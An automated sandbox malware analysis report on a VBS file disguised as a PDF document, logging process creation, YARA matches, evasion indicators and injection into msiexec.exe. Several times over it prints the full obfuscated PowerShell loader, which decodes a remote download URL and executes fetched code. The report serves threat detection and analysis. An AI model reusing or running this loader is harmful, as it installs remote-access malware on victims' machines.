neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBol
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF7C817BF46 3_2_00007FF7C817BF46
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF7C817CCF2 3_2_00007FF7C817CCF2
              Source: Document BT24#U00b7pdf.vbs Initial sample: Strings found which are bigger than 50
              Source: C:\Windows\System32\wscript.exe Process created: Commandline size = 6522
              Source: unknown Process created: Commandline size = 6522
              Source: amsi64_7624.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: amsi32_2112.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
              Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@12/7@3/2
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Unapplauding.Ove
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1988:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
              Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2212:120:WilError_03
              Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-EOQLI8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y10yx4od.fuf.ps1
              Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Document BT24#U00b7pdf.vbs"
              Source: C:\Windows\System32\wscript.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process Where Name = 'explorer.exe'
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7624
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2112
              Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: Document BT24#U00b7pdf.vbs Virustotal: Detection: 14%
              Source: Document BT24#U00b7pdf.vbs ReversingLabs: Detection: 18%
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\PING.EXE Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D 
neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBol
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: unknown Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
              Source: C:\Windows\System32\wscript.exe Section loaded: version.dll, kernel.appcore.dll, uxtheme.dll, sxs.dll, vbscript.dll, amsi.dll, userenv.dll, profapi.dll, wldp.dll, msasn1.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, msisip.dll, wshext.dll, scrobj.dll, gpapi.dll, wbemcomn.dll, mpr.dll, scrrun.dll, windows.storage.dll, propsys.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
              Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll, mswsock.dll, dnsapi.dll, rasadhlp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, amsi.dll, userenv.dll, profapi.dll, windows.storage.dll, wldp.dll, msasn1.dll, gpapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, secur32.dll, sspicli.dll, uxtheme.dll, rasapi32.dll, rasman.dll, rtutils.dll, mswsock.dll, winhttp.dll, ondemandconnroutehelper.dll, iphlpapi.dll, dhcpcsvc6.dll, dhcpcsvc.dll, dnsapi.dll, winnsi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, ncrypt.dll, ncryptsslp.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, winrnr.dll, sxs.dll
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll, mscoree.dll, kernel.appcore.dll, version.dll, vcruntime140_clr0400.dll, ucrtbase_clr0400.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, windows.storage.dll, wldp.dll, msasn1.dll, amsi.dll, userenv.dll, profapi.dll, msisip.dll, wshext.dll, appxsip.dll, opcservices.dll, gpapi.dll, secur32.dll, sspicli.dll, uxtheme.dll, wbemcomn.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, iphlpapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, fwpuclnt.dll, rasadhlp.dll, apphelp.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, wininet.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, winmm.dll, uxtheme.dll, comsvcs.dll, cmlua.dll, cmutil.dll, version.dll
              Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll, aclayers.dll, mpr.dll, sfc.dll, sfc_os.dll, msi.dll, version.dll, uxtheme.dll, textshaping.dll, kernel.appcore.dll, textinputframework.dll, coreuicomponents.dll, coremessaging.dll, ntmarta.dll, wintypes.dll
              Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
              Source: Window Recorder Window detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
              Source: Binary string: ows\dll\System.pdb source: powershell.exe, 00000003.00000002.1591758260.0000026D744F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.1592246740.0000026D746F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: stem.Core.pdbG source: powershell.exe, 00000008.00000002.1977131315.0000000007415000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: bpdbtem.pdbh source: powershell.exe, 00000003.00000002.1591758260.0000026D744F4000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: powershell.exe, 00000003.00000002.1592246740.0000026D746F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000003.00000002.1592246740.0000026D746F0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: .Core.pdbq source: powershell.exe, 00000008.00000002.1977131315.0000000007415000.00000004.00000020.00020000.00000000.sdmp

              Data Obfuscation

              Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("Powershell "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} fu", "0")
              Source: Yara match File source: 00000008.00000002.2006894025.000000000B775000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 0000000C.00000002.2198489386.0000000005FF5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000003.00000002.1582725505.0000026D10302000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.2006537244.0000000008750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara match File source: 00000008.00000002.1971298491.0000000005A9B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Bobestyrernes)$GlobAL:SKEPTikerNE = [sySTEm.TEXT.ENcoDinG]::asCii.GETstrING($UnproVeRBiALLY24)$GLobaL:aNARITHIA=$skepTIKernE.sUbSTRInG($sVInGfJer,$gastroEnTeroCoLOSTOMY)<#Vurdere Hel
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: GetDelegateForFunctionPointer((Tragicomedy $Unslender $Satrapal), (Prcisionsarbejde @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Conducingly = [AppDomain]::CurrentDomain.GetAssemblies
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Motivelessness)), $Papemballages).DefineDynamicModule($Toxical, $false).DefineType($Gushed, $Funambulated, [System.MulticastDelegate])
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Bobestyrernes)$GlobAL:SKEPTikerNE = [sySTEm.TEXT.ENcoDinG]::asCii.GETstrING($UnproVeRBiALLY24)$GLobaL:aNARITHIA=$skepTIKernE.sUbSTRInG($sVInGfJer,$gastroEnTeroCoLOSTOMY)<#Vurdere Hel
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D 
neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBol
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $elselskaber;function Xanthorrhiza($Diagnostikkernes){ .($Optimalvaerdi) ($Diagnostikkernes)} function raspite($Ambivalentes){$smaabarnsalderen=4;do{$Summker+=$Ambivalentes[$smaabarnsalderen];$smaabarnsalderen+=5;$Skaberaktapirer=Format-List} until(!$Ambivalentes[$smaabarnsalderen])$Summker}$Spaltedefinitionen=raspite ' ndnHjlpeM thtThra.Lesiw';$Spaltedefinitionen+=raspite 'MasteB,reb Di CTeralSl gIAssieBeh,N irT';$Choremen=raspite 'ro fM ForoSa,izGagsiMpanlUnc lAnt aDeme/';$Polytungstate=raspite 'SaniTGogolStifs Agu1 Afs2';$Hematohidrosis='Inve[No.nNSlutE Rabt K l.AnthSUnexE,essrQuinVMilliTolacMillEStraPTridO PeriContNOpsuT UdvMOm,iA s lNOrgaa B,rgBeg,eStemrKa,e]F,rf:Duch:H.poS HijePh,ecUdfruSnekRProtiIncoT.arayBuckpFlotrSky oVoltTKo goFor cTriao ortlWar =taag$StatP puno griLNeu YEmpeTGoo UOec NSmregTills ShatSv daOvertPrope';$Choremen+=raspite 'Rets5Lede.De i0 enc Doe(AttaW AngiCompn ynkdOp roV.trwFangs Spr S.riNDioxTfaca Misa1T ta0Cruc.Dile0Hjem;Genl UnpeWVulgiNedknRadi6Tilb4Bybu;Sp l K igx nap6Graf4Mu t; Ndt FrorMontvSkib:T mm1Past3 Den4 trl.Unmo0Fal )A la ForsG KnaeMigrcOophkGer,oFjl./Ar.e2Unr 0 V n1Zair0Peri0Skab1benz0Phys1Ran PleFClasi mstrFlaweSeksfuopdo allxPala/du,n1 .nt3Hjul4Rall.Gibb0';$Gyldigheder=raspite 'FormuSociSPo aEKibbRInst-Hr,eANobigExtrEFordnBi eT';$Reaccepted=raspite 'OpdrhPaaktUordt E,cp ActsPort:B,ro/Vldi/ la,dUdsor C.ciUdvivIntae Sid.Car g dskoRag o Th gFeeblP eseUdpa.Outwc emeoSnnemB se/Omn,u ankc Unq?muskeSignx I,rp ormoa rer Bo tK rn=.dspdHensot,ylw DatnSavnlPolyoKonta.occdPree& BigiNajad Gru=B rn1 For2VedlO AmaPIndf5Sho.AS ymsLodnIBathYSdceXTemae.abrKUndeOHairNTes 8 SniaAga z,fveVvend9U peDOlivtM ttsOv r0DomfsUndlJtranh SpijHypnUBo lxOrthJTappTLrlisterrm';$Genette=raspite 'Loph>';$Optimalvaerdi=raspite 'ForuI D 
neChlox';$Trafikkens='Amfibietanken';$Unphilosophize47='\Unapplauding.Ove';Xanthorrhiza (raspite 'Stre$ fsGBomblem.go Kr,b ranaNdteLKut :minyGstumRRatioBrevwKapaLHp te ondDDiff9Af,j6 Myl=G.rt$ TilEsku.NDaugv C b:SomnaSlu pCommp ardd FlyABondt ediaSupe+ Exc$SammUStranInt,pNonpH DifIponyL SupOTopus Proo rnepNonsHSa tIDmpezVoliE chl4Kerm7');Xanthorrhiza (raspite 'udst$ FjeG,hriL IngO AfsB OstaRisplfrdi:BerbeShusr EctyDrontBimah MesrGeneOSpatCMascYT avT ompe Vi SBrdd=,ors$ProbR ForE Sala UndCBag CReveEAmorPHysttautoETuscDSond.SolosAllePReboLGl sibakkTStik(Foot$ kidgBirtEAvilNClube SpatrepatRepuE Coq)');Xanthorrhiza (raspite $Hematohidrosis);$Reaccepted=$Erythrocytes[0];$Beregningsgrundlag=(raspite 'Helb$turiGPi gL keno GriBMaxiaAbmhlRegn:,peckHe dNS goino dPStallNonsiUnsin VirGUnansKabekPreljFritoPa.tl,xfoeLysonInddS Fin=Ki,bnWeaseSalvW Lnk-Quo,O bumBs.spJ,rbaeLodgcGiggT Doo SunfSBrouY recs hawtFlukePartMInv,.Poly$C,mpSDobbpStopa ngalKataTSlamEHemodTromeantifJumbi MetnEgadIKl.mtprovIMalmoVrdin CigEUn rn');Xanthorrhiza ($Beregningsgrundlag);Xanthorrhiza (raspite 'S bi$ ValKGen,nUndeiBolJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF7C81751F5 push eax; ret 3_2_00007FF7C8175241
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF7C8243550 push eax; iretd 3_2_00007FF7C8243551
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_00007FF7C82479FE push ds; ret 3_2_00007FF7C82479FF
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_0748CF5C push eax; iretd 8_2_0748CF5D
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\msiexec.exe Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: Initial file Initial file: Do While Aalekragerne.Status = 0 WScript.Sleep 100
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4720
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5211
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7844
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1735
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6428 Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6676 Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Windows\SysWOW64\msiexec.exe TID: 4848 Thread sleep count: 35 > 30
              Source: msiexec.exe, 0000000C.00000002.2222859365.00000000075D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWm
              Source: PING.EXE, 00000001.00000002.1300585394.000002408B3E9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv%
              Source: msiexec.exe, 0000000C.00000002.2222859365.00000000075D6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
              Source: msiexec.exe, 0000000C.00000002.2222859365.000000000757A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
              Source: powershell.exe, 00000003.00000002.1592246740.0000026D7472E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\msiexec.exe Process queried: DebugPort

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exe
              Source: Yara match, File source: amsi64_7624.amsi.csv, type: OTHER
              Source: Yara match, File source: Process Memory Space: powershell.exe PID: 7624, type: MEMORYSTR
              Source: Yara match, File source: Process Memory Space: powershell.exe PID: 2112, type: MEMORYSTR
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Thread APC queued: target process: C:\Windows\SysWOW64\msiexec.exe
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Memory written: C:\Windows\SysWOW64\msiexec.exe base: 3730000
              Source: C:\Windows\System32\wscript.exe, Process created: C:\Windows\System32\PING.EXE ping Host_6637.6637.6637.657e
